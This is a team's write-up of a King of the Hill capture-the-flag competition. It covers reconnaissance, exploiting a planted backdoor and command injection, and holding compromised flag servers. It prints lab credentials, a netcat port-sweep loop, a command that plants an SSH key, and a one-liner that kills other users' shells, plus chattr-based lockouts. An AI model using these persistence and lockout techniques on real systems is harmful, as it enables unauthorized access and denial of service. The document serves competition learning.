Intro King of the Hill (KotH) Challenges involve a user taking control of a server and leaving their identifier on a specified target server/application. This indicates which user/team has control of the server.
Network 1. Team Subnets: Each team has a subnet containing: 1 Boundary Vyos Router at .1 IP, which connects to the Hill Subnet. 5 Kali Linux Systems for offensive actions. 1 Flag Server at .100 IP, where each team needs to place their CTF ID in owner.txt to score points. 2. Hill Subnet (192.168.20.0/24): Contains vulnerable Linux, Windows 10, and Windows 11 flag servers. Also includes a Big Hill server that awards 3 points per poll if captured. Off-limits Hill (VIVID Flag): A restricted flag that incurs penalties if captured. 3. Access Control and Credentials: Each team’s boundary router can be accessed via SSH on port 22 using vividctf:vividctf. Each team’s flag server is accessible via SSH on port 22222 with vividctf:vividctf. Boundary routers block external incoming traffic on ports 22 and 3389 by default. Each team is allowed to sabotage others by modifying configurations, except on their Kali systems. 4. Objective: Teams need to place their CTF ID in the owner.txt file on their own flag server and on as many Hill Subnet flag servers as possible. Points are awarded every 60 seconds based on the contents of owner.txt files in each server. Each team can reach the Hill Subnet as well as other teams’ subnets, enabling cross-network attacks and defenses. Action Plan: 1. Planning and Team Strategy At the outset, we conducted a team discussion to devise an action plan. Roles were distributed as follows: 2 members focused on attacking: Their goal was to target opponent systems and the Hill subnet. 2 members focused on defending: They ensured the security of our subnet and servers. 1 member focused on reconnaissance: This role was crucial for gathering intelligence on other teams and the Hill subnet. 2. Initial Target: Routers Our first target was the boundary routers of other teams. By compromising their routers, we aimed to disrupt their communication and gain a strategic advantage. This step ensured we could manipulate or observe network traffic as needed. 3. Hill Subnet Reconnaissance After running a host scan on the Hill subnet, we discovered multiple machines with active services. To identify the services running on these machines, we executed a service detection scan using the following command: nmap -iL hill.txt -p- -sV 4. Discovery of Unusual Activity During the scan, one machine stood out with over 500 open ports in the range of 32000 to 60000. Nmap failed to identify the specific services on these ports due to the use of decoys, which masked the actual services. 5. Flag Server Review When we obtained access to our flag server, we conducted a thorough review of all the open ports and running services on the machine. We found that there was a Python service running on a randomized port between 40000-60000 which could grant anyone backdoor access to the machine given a correct string input payload. Our assumption was that the initial state of all the flag servers in the competition would be the same, and thus the backdoor would exist on flag servers of all teams. 6. Automated Port Scans Our assumption was proven correct when we did a port scan in the range 40000-60000 on other team’s flag servers, and found one port giving us different output than the others. This was done using the following command: for port in {40000..60000}; do nc 192.168.2.100 $port; done This allowed us to iterate through the ports and look for unexpected responses. 7. Exploiting a Backdoor Once the port was identified, exploiting the backdoor was as simple as crafting a payload that was sent after we established a connection using the above netcat command. The backdoor gave us a limited /bin/sh shell, which we transformed into a full fledged shell with: /bin/bash -i Thus, now we had full access to the flag servers of multiple teams. We also made sure to patch the running backdoor on our flag server so as to not be compromised the same way by other teams. 8. Claiming Flag Servers The scoring system of the competition was based on which team’s flag was in the /root/owner.txt file of each flag server. Initially, we edited the owner.txt file to claim ownership and earn 3 points per minute. However, we couldn’t establish persistence, and an opposing team eventually removed our access by stopping our shell process and patched the backdoor. 9. Web Server Exploitation On further analysis of the flag server, we also discovered a running web server. Nmap scan report for 192.168.2.100 Host is up (0.00048s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Node.js Express framework Through reconnaissance and testing, we identified a command injection vulnerability in the web application. Exploiting this vulnerability, we regained access to the machine through this alternative vulnerability. 10. Establishing Persistence This time, so as to not get kicked out of the flag servers by opposing teams, our first goal was to establish persistence. This was done via a few steps: Putting our ssh public key in ~/.ssh/authorized_keys: echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqIvZaOr0exvLzNtjueoj3qyYydaHFgSgbjn3OqE6XVgydjIP4cIfN2xOxrT56JQODsoBya8HLrRrejNaLw6sK+8+8Vh+J/kp5Qb3J4kmVdosvWhWV/QWlTlmVassAwz0laZHTZucbYtH45zJ9RpjWpgbBCmgc8s5LN+88ZQcob17F0+r/GeBH+3KBzV/CccPV+0nQ2Umr94UDqixDUMEI1oOmi88jV/EUVIgP9l8Wjz0AfcCLKG0mT7EIiQpPsN2GfYQ0lcJBpp2+OIcqwZ7q4DgGQOz1OKgbTemC3XZ6fGsNxtbrdzGvwKo4c3LLm/DKI5hVx826NiWikNNox/9kM1VipqfnOozsQLdN6CjGUarExlsvHb6iP/UHHc537jB3ZiYHKHeE1tbkiBFKOAFHfw8VkY+s7SQCcMLOuID91epMUQoKIp2pXU88wYEQuf7t0J/9/pJRbaK8VI+mVPCSVcZ5K2zSw+J/W3qVpIjnGuqPK8bJa0ftGfqgXBBPkk0= mayank” > ~/.ssh/authorized_keys Changing the root password to something only our team knew Kicking all the other people on the server by terminating their bash processes using the following command: current_pid=$$; for pid in $(pgrep -x bash | grep -v "$current_pid"); do kill -9 $pid; done Doing this on a few flag servers, we now had full exclusive access to multiple flag servers. 11. Locked Permissions and Claiming Flags Upon regaining persistent access, we found that the permissions on owner.txt had been locked using the chattr command, making it read only and preventing us from modifying the file. We discovered this by getting errors when writing to the file even though we were root, the file was owned by root and the file had permissions 0o644. On checking the file using lsattr we confirmed that the write attribute had been removed, thus we needed chattr to add the write attribute back to the file. Additionally, the chattr command was also removed from its original location in the /bin/ directory. This step, likely implemented by the opposing team before we kicked them, was to mitigate our attempts to claim points. However, on searching for the whole chattr binary in the whole filesystem, we found it hidden in a randomly named directory: find / -name chattr 2>/dev/null Output: /var/7cy7grc93q97c/chattr Using the chattr binary, we changed the attributes of the owner.txt file such that we could have write access, and put our flag in the file to start gaining points. We also used chattr to remove write access from the owner.txt file from ours and other flag servers that we pwned just to make it difficult for an opposing team to change this file even if we lose access somehow. But that did not happen. Summary Before the King of the Hill segment of the competition, we were in 11th place. But after the King of the Hill, our team ended up in 5th place. Being fast, constantly monitoring the machines we owned for any suspicious activity, and constantly attacking other teams ensured that we did very well in the part of the competition, leading to substantial gaining of ranks. We learned about conducting reconnaissance, finding vulnerabilities through code review, exploiting servers through known vectors and maintaining persistence after compromising a machine through this competition.
...